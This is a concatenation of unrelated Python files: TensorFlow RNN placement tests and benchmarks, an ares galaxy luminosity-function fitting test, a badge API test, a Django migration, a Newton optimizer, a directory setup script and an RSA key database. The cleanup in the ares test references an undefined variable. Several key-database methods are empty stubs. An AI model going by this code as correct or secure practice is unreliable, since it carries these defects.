# Writes happen at output of RNN cell
_assert_in("TensorArrayWrite", gpu_stats, cpu_stats)
# Gather happens on final TensorArray
_assert_in("TensorArrayGather", gpu_stats, cpu_stats)
# Reads happen at input to RNN cell
_assert_in("TensorArrayRead", cpu_stats, gpu_stats)
# Scatters happen to get initial input into TensorArray
_assert_in("TensorArrayScatter", cpu_stats, gpu_stats)
def testRNNOnCPUCellOnCPU(self):
if not tf.test.is_gpu_available():
return # Test requires access to a GPU
run_metadata = self._execute_rnn_on(
rnn_device="/cpu:0", cell_device="/cpu:0", input_device="/gpu:0")
step_stats = run_metadata.step_stats
ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
gpu_stats = step_stats.dev_stats[ix].node_stats
cpu_stats = step_stats.dev_stats[1 - ix].node_stats
def _assert_in(op_str, in_stats, out_stats):
self.assertTrue(any(op_str in s.node_name for s in in_stats))
self.assertFalse(any(op_str in s.node_name for s in out_stats))
# All TensorArray operations happen on CPU
_assert_in("TensorArray", cpu_stats, gpu_stats)
def testInputOnGPUCellNotDeclared(self):
if not tf.test.is_gpu_available():
return # Test requires access to a GPU
run_metadata = self._execute_rnn_on(input_device="/gpu:0")
step_stats = run_metadata.step_stats
ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
gpu_stats = step_stats.dev_stats[ix].node_stats
cpu_stats = step_stats.dev_stats[1 - ix].node_stats
def _assert_in(op_str, in_stats, out_stats):
self.assertTrue(any(op_str in s.node_name for s in in_stats))
self.assertFalse(any(op_str in s.node_name for s in out_stats))
# Everything happens on GPU
_assert_in("TensorArray", gpu_stats, cpu_stats)
######### Benchmarking RNN code
def _static_vs_dynamic_rnn_benchmark_static(inputs_list_t, sequence_length):
(_, input_size) = inputs_list_t[0].get_shape().as_list()
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
cell = tf.contrib.rnn.LSTMCell(
num_units=input_size, use_peepholes=True, initializer=initializer,
state_is_tuple=False)
outputs, final_state = tf.contrib.rnn.static_rnn(
cell, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
gradients = tf.gradients(outputs + [final_state], trainable_variables)
return tf.group(final_state, *(gradients + outputs))
def _static_vs_dynamic_rnn_benchmark_dynamic(inputs_t, sequence_length):
(unused_0, unused_1, input_size) = inputs_t.get_shape().as_list()
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
cell = tf.contrib.rnn.LSTMCell(
num_units=input_size, use_peepholes=True, initializer=initializer,
state_is_tuple=False)
outputs, final_state = tf.nn.dynamic_rnn(
cell, inputs_t, sequence_length=sequence_length, dtype=tf.float32)
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
gradients = tf.gradients([outputs, final_state], trainable_variables)
return tf.group(final_state, outputs, *gradients)
def graph_creation_static_vs_dynamic_rnn_benchmark(max_time):
config = tf.ConfigProto()
config.allow_soft_placement = True
# These parameters don't matter
batch_size = 512
num_units = 512
# Set up sequence lengths
np.random.seed([127])
sequence_length = np.random.randint(0, max_time, size=batch_size)
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(max_time)]
inputs = np.dstack(inputs_list).transpose([0, 2, 1]) # batch x time x depth
def _create_static_rnn():
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _static_vs_dynamic_rnn_benchmark_static(
inputs_list_t, sequence_length)
def _create_dynamic_rnn():
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_t = tf.Variable(inputs, trainable=False).value()
ops = _static_vs_dynamic_rnn_benchmark_dynamic(
inputs_t, sequence_length)
delta_static = timeit.timeit(_create_static_rnn, number=5)
delta_dynamic = timeit.timeit(_create_dynamic_rnn, number=5)
print("%d \t %f \t %f \t %f" %
(max_time, delta_static, delta_dynamic, delta_dynamic/delta_static))
return delta_static, delta_dynamic
def _timer(sess, ops):
# Warm in
for _ in range(2):
sess.run(ops)
# Timing run
runs = 20
start = time.time()
for _ in range(runs):
sess.run(ops)
end = time.time()
return (end - start)/float(runs)
def static_vs_dynamic_rnn_benchmark(batch_size, max_time, num_units, use_gpu):
config = tf.ConfigProto()
config.allow_soft_placement = True
# Set up sequence lengths
np.random.seed([127])
sequence_length = np.random.randint(0, max_time, size=batch_size)
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(max_time)]
inputs = np.dstack(inputs_list).transpose([0, 2, 1]) # batch x time x depth
# Using rnn()
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _static_vs_dynamic_rnn_benchmark_static(
inputs_list_t, sequence_length)
tf.global_variables_initializer().run()
delta_static = _timer(sess, ops)
# Using dynamic_rnn()
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_t = tf.Variable(inputs, trainable=False).value()
ops = _static_vs_dynamic_rnn_benchmark_dynamic(
inputs_t, sequence_length)
tf.global_variables_initializer().run()
delta_dynamic = _timer(sess, ops)
print("%d \t %d \t %d \t %s \t %f \t %f \t %f" %
(batch_size, max_time, num_units, use_gpu, delta_static,
delta_dynamic, delta_dynamic/delta_static))
return delta_static, delta_dynamic
def _half_seq_len_vs_unroll_half_rnn_benchmark(inputs_list_t, sequence_length):
(_, input_size) = inputs_list_t[0].get_shape().as_list()
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
cell = tf.contrib.rnn.LSTMCell(
num_units=input_size, use_peepholes=True, initializer=initializer,
state_is_tuple=False)
outputs, final_state = tf.contrib.rnn.static_rnn(
cell, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
gradients = tf.gradients(outputs + [final_state], trainable_variables)
return tf.group(final_state, *(gradients + outputs))
def half_seq_len_vs_unroll_half_rnn_benchmark(
batch_size, max_time, num_units, use_gpu):
config = tf.ConfigProto()
config.allow_soft_placement = True
# Set up sequence lengths
np.random.seed([127])
sequence_length = max_time * np.ones((batch_size,))
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(max_time)]
# Halve the sequence length, full static unroll
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _half_seq_len_vs_unroll_half_rnn_benchmark(
inputs_list_t, sequence_length / 2)
tf.global_variables_initializer().run()
delta_half_seq_len = _timer(sess, ops)
# Halve the unroll size, don't use sequence length
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _half_seq_len_vs_unroll_half_rnn_benchmark(
inputs_list_t[:(max_time // 2)], sequence_length / 2)
tf.global_variables_initializer().run()
delta_unroll_half = _timer(sess, ops)
print("%d \t %d \t\t %d \t %s \t %f \t\t %f \t\t %f" %
(batch_size, max_time, num_units, use_gpu, delta_half_seq_len,
delta_unroll_half, delta_half_seq_len/delta_unroll_half))
return delta_half_seq_len, delta_unroll_half
def _concat_state_vs_tuple_state_rnn_benchmark(
inputs_list_t, sequence_length, state_is_tuple):
(_, input_size) = inputs_list_t[0].get_shape().as_list()
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
cell = tf.contrib.rnn.LSTMCell(
num_units=input_size, use_peepholes=True,
initializer=initializer, state_is_tuple=state_is_tuple)
outputs, final_state = tf.contrib.rnn.static_rnn(
cell, inputs_list_t, sequence_length=sequence_length, dtype=tf.float32)
final_state = list(final_state) if state_is_tuple else [final_state]
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
gradients = tf.gradients(outputs + final_state, trainable_variables)
return tf.group(*(final_state + gradients + outputs))
def concat_state_vs_tuple_state_rnn_benchmark(
batch_size, max_time, num_units, use_gpu):
config = tf.ConfigProto()
config.allow_soft_placement = True
# Set up sequence lengths
np.random.seed([127])
sequence_length = max_time * np.ones((batch_size,))
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(max_time)]
# Run with concatenated states (default)
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _concat_state_vs_tuple_state_rnn_benchmark(
inputs_list_t, sequence_length, state_is_tuple=False)
tf.global_variables_initializer().run()
delta_concat_state = _timer(sess, ops)
# Run with tuple states (new)
with tf.Session(config=config, graph=tf.Graph()) as sess:
with tf.device("/cpu:0" if not use_gpu else None):
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _concat_state_vs_tuple_state_rnn_benchmark(
inputs_list_t, sequence_length, state_is_tuple=True)
tf.global_variables_initializer().run()
delta_tuple_state = _timer(sess, ops)
print("%d \t %d \t %d \t %s \t %f \t\t %f \t\t %f" %
(batch_size, max_time, num_units, use_gpu, delta_concat_state,
delta_tuple_state, delta_concat_state/delta_tuple_state))
return delta_concat_state, delta_tuple_state
def _dynamic_rnn_swap_memory_benchmark(inputs_t, sequence_length,
swap_memory):
(unused_0, unused_1, input_size) = inputs_t.get_shape().as_list()
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=127)
cell = tf.contrib.rnn.LSTMCell(
num_units=input_size, use_peepholes=True, initializer=initializer,
state_is_tuple=False)
outputs, final_state = tf.nn.dynamic_rnn(
cell, inputs_t, sequence_length=sequence_length,
swap_memory=swap_memory, dtype=tf.float32)
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
gradients = tf.gradients([outputs, final_state], trainable_variables)
return tf.group(final_state, outputs, *gradients)
def dynamic_rnn_swap_memory_benchmark(batch_size, max_time, num_units):
config = tf.ConfigProto()
config.allow_soft_placement = True
# Set up sequence lengths
np.random.seed([127])
sequence_length = np.random.randint(0, max_time, size=batch_size)
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(max_time)]
inputs = np.dstack(inputs_list).transpose([0, 2, 1]) # batch x time x depth
# No memory swap
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_t = tf.Variable(inputs, trainable=False).value()
ops = _dynamic_rnn_swap_memory_benchmark(
inputs_t, sequence_length, swap_memory=False)
tf.global_variables_initializer().run()
no_swap = _timer(sess, ops)
# Memory swap
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_t = tf.Variable(inputs, trainable=False).value()
ops = _dynamic_rnn_swap_memory_benchmark(
inputs_t, sequence_length, swap_memory=True)
tf.global_variables_initializer().run()
swap = _timer(sess, ops)
print("%d \t %d \t %d \t %f \t %f \t %f" %
(batch_size, max_time, num_units, no_swap, swap, swap/no_swap))
return no_swap, swap
def rnn_long_sequence_benchmark(batch_size, seqlen, num_units,
dynamic, swap_memory):
config = tf.ConfigProto()
config.allow_soft_placement = True
# Set up sequence lengths
np.random.seed([127])
sequence_length = [seqlen for _ in range(batch_size)]
inputs_list = [
np.random.randn(batch_size, num_units).astype(np.float32)
for _ in range(seqlen)]
inputs = np.dstack(inputs_list).transpose([0, 2, 1]) # batch x time x depth
for _ in range(5):
if dynamic:
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_t = tf.Variable(inputs, trainable=False).value()
ops = _dynamic_rnn_swap_memory_benchmark(
inputs_t, sequence_length, swap_memory=swap_memory)
tf.global_variables_initializer().run()
elapsed = _timer(sess, ops)
else:
with tf.Session(config=config, graph=tf.Graph()) as sess:
inputs_list_t = [
tf.Variable(x, trainable=False).value() for x in inputs_list]
ops = _static_vs_dynamic_rnn_benchmark_static(
inputs_list_t, sequence_length)
tf.global_variables_initializer().run()
elapsed = _timer(sess, ops)
print("%d \t %d \t %d \t %s \t %f \t %f" %
(batch_size, seqlen, num_units, dynamic, elapsed,
elapsed/seqlen))
class BenchmarkRNN(tf.test.Benchmark):
def benchmarkGraphCreationStaticVsDynamicLSTM(self):
print("Graph Creation: Static Unroll vs. Dynamic Unroll LSTM")
print("max_t \t dt(static) \t dt(dynamic) \t dt(dynamic)/dt(static)")
for max_time in (1, 25, 50):
s_dt, d_dt = graph_creation_static_vs_dynamic_rnn_benchmark(max_time)
self.report_benchmark(name="graph_creation_time_static_T%02d" % max_time,
iters=5, wall_time=s_dt)
self.report_benchmark(name="graph_creation_time_dynamic_T%02d" % max_time,
iters=5, wall_time=d_dt)
def benchmarkStaticUnrollVsDynamicFlowLSTM(self):
print("Calculation: Static Unroll with Dynamic Flow LSTM "
"vs. Dynamic Unroll LSTM")
print("batch \t max_t \t units \t gpu \t dt(static) \t dt(dynamic) "
"\t dt(dynamic)/dt(static)")
for batch_size in (256,):
for max_time in (50,):
for num_units in (512, 256, 128):
for use_gpu in (False, True):
s_dt, d_dt = static_vs_dynamic_rnn_benchmark(
batch_size, max_time, num_units, use_gpu)
self.report_benchmark(
name="static_unroll_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=s_dt)
self.report_benchmark(
name="dynamic_unroll_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=d_dt)
def benchmarkDynamicLSTMNoMemorySwapVsMemorySwap(self):
print("Calculation: Dynamic LSTM No Memory Swap vs. Memory Swap")
print("batch \t max_t \t units \t no_swap \t swap \t swap/no_swap")
for batch_size in (256, 512):
for max_time in (100,):
for num_units in (512, 256, 128):
no_swap, swap = dynamic_rnn_swap_memory_benchmark(
batch_size, max_time, num_units)
self.report_benchmark(
name="dynamic_lstm_no_memory_swap_T%02d_B%03d_N%03d"
% (max_time, batch_size, num_units),
iters=20, wall_time=no_swap)
self.report_benchmark(
name="dynamic_lstm_with_memory_swap_T%02d_B%03d_N%03d"
% (max_time, batch_size, num_units),
iters=20, wall_time=swap)
def benchmarkStaticUnrollHalfSequenceLengthVsHalfUnroll(self):
print("Calculation: Static Unroll with Halved Sequence Length "
"vs. Half Static Unroll")
print("batch \t full_t \t units \t gpu \t dt(half_seq_len) "
"\t dt(unroll_half) \t dt(half_seq_len)/dt(unroll_half)")
for batch_size in (128,):
for max_time in (50,):
for num_units in (256,):
for use_gpu in (False, True):
s_dt, d_dt = half_seq_len_vs_unroll_half_rnn_benchmark(
batch_size, max_time, num_units, use_gpu)
self.report_benchmark(
name="half_seq_len_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=s_dt)
self.report_benchmark(
name="unroll_half_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=d_dt)
def benchmarkStaticUnrollStateConcatVsStateTuple(self):
print("Calculation: Static Unroll with Concatenated State "
"vs. Tuple State")
print("batch \t time \t units \t gpu \t dt(concat_state) "
"\t dt(tuple_state) \t dt(concat_state)/dt(tuple_state)")
for batch_size in (16, 128,):
for max_time in (50,):
for num_units in (16, 128,):
for use_gpu in (False, True):
c_dt, t_dt = concat_state_vs_tuple_state_rnn_benchmark(
batch_size, max_time, num_units, use_gpu)
self.report_benchmark(
name="concat_state_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=c_dt)
self.report_benchmark(
name="tuple_state_time_T%02d_B%03d_N%03d_gpu_%s"
% (max_time, batch_size, num_units, use_gpu),
iters=20, wall_time=t_dt)
if __name__ == "__main__":
tf.test.main()
|
"""
test_inference_lf.py
Author: Jordan Mirocha
Affiliation: McGill
Created on: Wed 25 Mar 2020 11:01:32 EDT
Description:
"""
import os
import glob
import ares
import numpy as np
import matplotlib.pyplot as pl
from ares.physics.Constants import rhodot_cgs
def test():
# Will save UVLF at these redshifts and magnitudes
redshifts = np.array([3, 3.8, 4, 4.9, 5, 5.9, 6, 6.9, 7, 7.9, 8])
MUV = np.arange(-28, -8.8, 0.2)
fit_z = [6]
# blob 1: the LF. Give it a name, and the function needed to calculate it.
blob_n1 = ['galaxy_lf']
blob_i1 = [('z', redshifts), ('x', MUV)]
blob_f1 = ['LuminosityFunction']
blob_pars = \
{
'blob_names': [blob_n1],
'blob_ivars': [blob_i1],
'blob_funcs': [blob_f1],
'blob_kwargs': [None],
}
# Do a Schechter function fit just for speed
base_pars = \
{
'pop_sfr_model': 'uvlf',
# Stellar pop + fesc
'pop_calib_wave': 1600.,
'pop_lum_per_sfr': 0.2e28, # to avoid using synthesis models
'pop_uvlf': 'pq',
'pq_func': 'schechter_evol',
'pq_func_var': 'MUV',
'pq_func_var2': 'z',
# Bouwens+ 2015 Table 6 for z=5.9
#'pq_func_par0[0]': 0.39e-3,
#'pq_func_par1[0]': -21.1,
#'pq_func_par2[0]': -1.90,
#
# phi_star
'pq_func_par0': np.log10(0.47e-3),
# z-pivot
'pq_func_par3': 6.,
# Mstar
'pq_func_par1': -20.95,
# alpha
'pq_func_par2': -1.87,
'pq_func_par4': -0.27,
'pq_func_par5': 0.01,
'pq_func_par6': -0.1,
}
base_pars.update(blob_pars)
free_pars = \
[
'pq_func_par0',
'pq_func_par1',
'pq_func_par2',
]
is_log = [False, False, False]
from distpy import DistributionSet
from distpy import UniformDistribution
ps = DistributionSet()
ps.add_distribution(UniformDistribution(-5, -1), 'pq_func_par0')
ps.add_distribution(UniformDistribution(-25, -15),'pq_func_par1')
ps.add_distribution(UniformDistribution(-3, 0), 'pq_func_par2')
guesses = \
{
'pq_func_par0': -3,
'pq_func_par1': -22.,
'pq_func_par2': -2.,
}
if len(fit_z) > 1:
free_pars.extend(['pq_func_par4', 'pq_func_par5', 'pq_func_par6'])
is_log.extend([False]*3)
guesses['pq_func_par4'] = -0.3
guesses['pq_func_par5'] = 0.01
guesses['pq_func_par6'] = 0.
ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par4')
ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par5')
ps.add_distribution(UniformDistribution(-2, 2), 'pq_func_par6')
# Test error-handling
for ztol in [0, 0.3]:
# Initialize a fitter object and give it the data to be fit
fitter_lf = ares.inference.FitGalaxyPopulation(**base_pars)
# The data can also be provided more explicitly
fitter_lf.ztol = ztol
fitter_lf.redshifts = {'lf': fit_z}
if ztol == 0:
try:
fitter_lf.data = 'bouwens2015'
except ValueError:
print("Correctly caught error! Moving on.")
continue
else:
# This should would if ztol >= 0.1, so we want this to crash
# visibly if there's a failure internally.
fitter_lf.data = 'bouwens2015'
fitz_s = 'z_'
for red in np.sort(fit_z):
fitz_s += str(int(round(red)))
fitter = ares.inference.ModelFit(**base_pars)
fitter.add_fitter(fitter_lf)
# Establish the object to which we'll pass parameters
from ares.populations.GalaxyCohort import GalaxyCohort
fitter.simulator = GalaxyCohort
fitter.parameters = free_pars
fitter.is_log = is_log
fitter.prior_set = ps
# In general, the more the merrier (~hundreds)
fitter.nwalkers = 2 * len(fitter.parameters)
fitter.jitter = [0.1] * len(fitter.parameters)
fitter.guesses = guesses
# Run the thing
fitter.run('test_uvlf', burn=10, steps=10, save_freq=10,
clobber=True, restart=False)
# Make sure things make sense
anl = ares.analysis.ModelSet('test_uvlf')
ax = anl.ReconstructedFunction('galaxy_lf', ivar=[6,None], fig=3,
color='gray', alpha=0.3)
anl.ReconstructedFunction('galaxy_lf', ivar=[6,None],
ax=ax, fig=3,
color='b', alpha=0.3, fill=False, samples='all')
anl.ReconstructedFunction('galaxy_lf', ivar=[6,None],
ax=ax, fig=3,
color='y', alpha=1.0, use_best=True, ls='--', lw=3)
ax.set_yscale('log')
ax.set_ylim(1e-8, 1)
gpop = ares.analysis.GalaxyPopulation()
gpop.PlotLF(5.9, sources='bouwens2015', ax=ax)
# Other random stuff
all_kwargs = anl.AssembleParametersList(include_bkw=True)
assert len(all_kwargs) == anl.chain.shape[0]
iML = np.argmax(anl.logL)
best_pars = anl.max_likelihood_parameters()
for i, par in enumerate(best_pars.keys()):
assert all_kwargs[iML][par] == best_pars[par]
anl.CorrelationMatrix(anl.parameters, fig=5)
# Clean-up
mcmc_files = glob.glob('{}/test_uvlf*'.format(os.environ.get('ARES')))
# Iterate over the list of filepaths & remove each file.
for fn in mcmc_files:
try:
os.remove(fn)
except:
print("Error while deleting file : ", filePath)
assert True
if __name__ == '__main__':
test()
|
from datetime import timedelta as td
from hc.api.models import Check
from hc.test import BaseTestCase
class GetBadgesTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self.a1 = Check(project=self.project, name="Alice 1")
self.a1.timeout = td(seconds=3600)
self.a1.grace = td(seconds=900)
self.a1.n_pings = 0
self.a1.status = "new"
self.a1.tags = "foo bar"
self.a1.save()
self.url = "/api/v1/badges/"
def get(self, api_key="X" * 32, qs=""):
return self.client.get(self.url + qs, HTTP_X_API_KEY=api_key)
def test_it_works(self):
r = self.get()
self.assertEqual(r.status_code, 200)
self.assertEqual(r["Access-Control-Allow-Origin"], "*")
doc = r.json()
self.assertTrue("foo" in doc["badges"])
self.assertTrue("svg" in doc["badges"]["foo"])
def test_readonly_key_is_allowed(self):
self.project.api_key_readonly = "R" * 32
self.project.save()
r = self.get(api_key=self.project.api_key_readonly)
self.assertEqual(r.status_code, 200)
def test_it_rejects_post(self):
r = self.csrf_client.post(self.url, HTTP_X_API_KEY="X" * 32)
self.assertEqual(r.status_code, 405)
def test_it_handles_missing_api_key(self):
r = self.client.get(self.url)
self.assertContains(r, "missing api key", status_code=401)
|
# Generated by Django 2.1.1 on 2019-03-16 21:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('deliveries', '0002_auto_20190316_2128'),
]
operations = [
migrations.AddField(
model_name='customer',
name='nickname',
field=models.CharField(default='joe', max_length=200),
preserve_default=False,
),
]
|
import numpy as np
from typing import Callable
from autograd import hessian
from .newton_base import NewtonBase
class Newton(NewtonBase):
def __init__(self, stop_criterion, step_optimizer) -> None:
super().__init__(stop_criterion, step_optimizer)
def _get_inverse_h(self, xk: np.ndarray) -> np.ndarray:
h = self._hessian(xk)
h = h.reshape((h.shape[1], h.shape[1]))
return np.linalg.inv(h)
def optimize(self, f: Callable, x0: np.ndarray) -> np.ndarray:
self._hessian = hessian(f)
return super().optimize(f, x0)
|
import os
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(PROJECT_ROOT)
DATA_DIR = BASE_DIR + '/data/'
SAMPLE_DIR = BASE_DIR + '/sample/'
MODEL_DIR = BASE_DIR + '/model/'
PARAM_DIR = BASE_DIR + '/output/param/'
OUTPUT_DIR = BASE_DIR + '/output/result/'
for DIR in [DATA_DIR, SAMPLE_DIR, MODEL_DIR, PARAM_DIR, OUTPUT_DIR]:
print(DIR)
if not os.path.exists(DIR):
os.makedirs(DIR) |
# -*- coding: utf_8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
# Crypto Key Database
import os
import sqlite3
import shutil
import uuid
import random
import base64
import Crypto.PublicKey.RSA
import Crypto.Random.random
import Crypto.Cipher.PKCS1_OAEP
import Crypto.Hash.SHA256
# increment keydb_version on DB schema changes
keydb_version = 2017090101
# main key db
class KeyDb:
def __init__(self,dbpath):
self._dbpath = dbpath
# create new DB if it doesn't exist
if not os.path.isfile(self._dbpath):
db_create(self._dbpath)
# connect to db
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
# enable cell size checking
c.execute('PRAGMA cell_size_check = 1')
# optimize and quick-check on open
c.execute('PRAGMA quick_check')
check_result = c.fetchone()[0]
if check_result != 'ok':
raise ValueError("DB Check failed: " + check_result)
c.execute('PRAGMA optimize')
# check current db version against code version
# perform upgrade if necessary
c.execute('PRAGMA user_version')
current_db_version = c.fetchone()[0]
conn.close()
if current_db_version < keydb_version:
self._Upgrade(current_db_version)
def New(self,parent_key_id=None,bits=2048,password=None,expiry='+2 years'):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
new_uuid = str(uuid.uuid4())
key_priv = Crypto.PublicKey.RSA.generate(bits)
key_pub = key_priv.publickey()
store_password = None
if parent_key_id:
store_password = base64.standard_b64encode(self.Encrypt(parent_key_id,password))
c.execute('DELETE FROM pubkey WHERE key_id=?', (new_uuid,))
c.execute('DELETE FROM privkey WHERE key_id=?', (new_uuid,))
c.execute('INSERT INTO pubkey (key_id, key_expiry, key) \
VALUES (?, datetime(\'now\', ?), ?)',
(new_uuid, expiry, key_pub.exportKey(),)
)
c.execute('INSERT INTO privkey (key_id, key_unlock_key_id, key_unlock_password, key) \
VALUES (?, ?, ?, ?)',
(new_uuid, parent_key_id, store_password, key_priv.exportKey(passphrase=password),)
)
conn.close()
return new_uuid
def Del(self,key_id):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def Check(self,key_id):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def HttpImport(self,data):
pass
def HttpExport(self,data):
pass
def ImportPubkey(self,key_id,key):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def ExportPubkey(self,key_id):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def Encrypt(self,key_id,data):
# RSA PubKey Encryption of data
# fetch public key
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
c.execute('SELECT key FROM pubkey WHERE key_id = ? AND key_expiry > datetime(\'now\')', (key_id,))
row = c.fetchone()
key_pub = None
if not row:
raise ValueError("Key not found in database")
# create RSA key object
key_pub = Crypto.PublicKey.RSA.importKey(row[0])
# RSA encryption
cipher = Crypto.Cipher.PKCS1_OAEP.new(key_pub, hashAlgo=Crypto.Hash.SHA256)
message = cipher.encrypt(data.encode('utf-8'))
conn.close()
return message
def Decrypt(self,key_id,password,data):
# RSA PubKey Decryption of data
# fetch public key
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
c.execute('SELECT key FROM privkey WHERE key_id = ?', (key_id,))
row = c.fetchone()
key_priv = None
if not row:
raise ValueError("Key not found in database")
# create RSA key object
key = row[0]
key_priv = Crypto.PublicKey.RSA.importKey(key,passphrase=password)
if not key_priv:
raise ValueError("Key could not be loaded, bad password?")
# RSA encryption
cipher = Crypto.Cipher.PKCS1_OAEP.new(key_priv, hashAlgo=Crypto.Hash.SHA256)
message = cipher.decrypt(data)
conn.close()
return message.decode('utf-8')
def Sign(self,key_id,password,data):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def Verify(self,key_id,data):
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
conn.close()
def KeyPassword(self,key_id):
# return the password stored in the db for the key (should be encrypted)
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
c.execute('SELECT key_unlock_password FROM privkey WHERE key_id = ?', (key_id,))
row = c.fetchone()
conn.close()
if not row:
return None
else:
return base64.standard_b64decode(row[0])
def _Upgrade(self,current_db_version):
# connect to DB handle
conn = sqlite3.connect(self._dbpath)
conn.isolation_level = None
c = conn.cursor()
# current_db_version == 0 means DB is brand new
# If not brand new, back it up and perform full checks
if current_db_version > 0:
c.execute('PRAGMA database_list')
dbpath = c.fetchone()[2]
# back up DB before modifying
# lock the entire DB
# see https://sqlite.org/pragma.html#pragma_locking_mode
c.execute('PRAGMA locking_mode = EXCLUSIVE')
# write some data to obtain an exclusive lock
c.execute('CREATE TABLE __temp_upgrade (temp INT)')
c.execute('INSERT INTO __temp_upgrade (temp) values (1)')
c.execute('SELECT * FROM __temp_upgrade')
c.execute('DROP TABLE __temp_upgrade')
c.execute('PRAGMA query_only = 1')
# copy DB file while we have an exclusive lock
backupdbpath = dbpath + '-backup-v' + str(current_db_version)
shutil.copyfile(dbpath, backupdbpath)
# unlock & write again to release exclusive lock
c.execute('PRAGMA query_only = 0')
c.execute('PRAGMA locking_mode = NORMAL')
c.execute('CREATE TABLE __temp_upgrade (temp INT)')
c.execute('INSERT INTO __temp_upgrade (temp) values (1)')
c.execute('SELECT * FROM __temp_upgrade')
c.execute('DROP TABLE __temp_upgrade')
# perform integrity check
c.execute('PRAGMA integrity_check')
check_result = c.fetchone()[0]
if check_result != 'ok':
raise ValueError("DB Check failed: " + check_result)
# perform upgrades
# IMPORTANT: upgrades are performed IN ORDER
# remember to set current_db_version to the new version
# Example:
#if current_db_version < 2017090101:
# c.execute('CREATE TABLE foo(bar INT, baz TEXT)')
# c.execute('PRAGMA user_version = 2017090101')
# current_db_version = 2017090101
#
#if current_db_version < 2017090102:
# c.execute('alter table foo add column blah text')
# c.execute('PRAGMA user_version = 2017090102')
# current_db_version = 2017090102
# version 2017090101
# initial version
if current_db_version < 2017090101:
c.execute('CREATE TABLE privkey (key_id TEXT PRIMARY KEY NOT NULL, key TEXT, key_unlock_key_id TEXT, key_unlock_password TEXT)')
c.execute('CREATE TABLE pubkey (key_id TEXT PRIMARY KEY NOT NULL, key TEXT, key_expiry TEXT)')
c.execute('PRAGMA user_version = 2017090101')
current_db_version = 2017090101
# End of upgrades, run an optimize and vacuum too
c.execute('PRAGMA optimize')
c.execute('VACUUM')
conn.close()
# in-memory password storage scrambling function for key passwords
class KeyPw:
def __init__(self):
# possible characters for randomly-generated passwords (typable ASCII)
self.pwchars = list('~!@#$%^&*()_+1234567890-=QWERTYUIOP{}|qwertyuiop[]\\ASDFGHJKL:"asdfghjkl;\'ZXCVBNM<>?zxcvbnm,./ ')
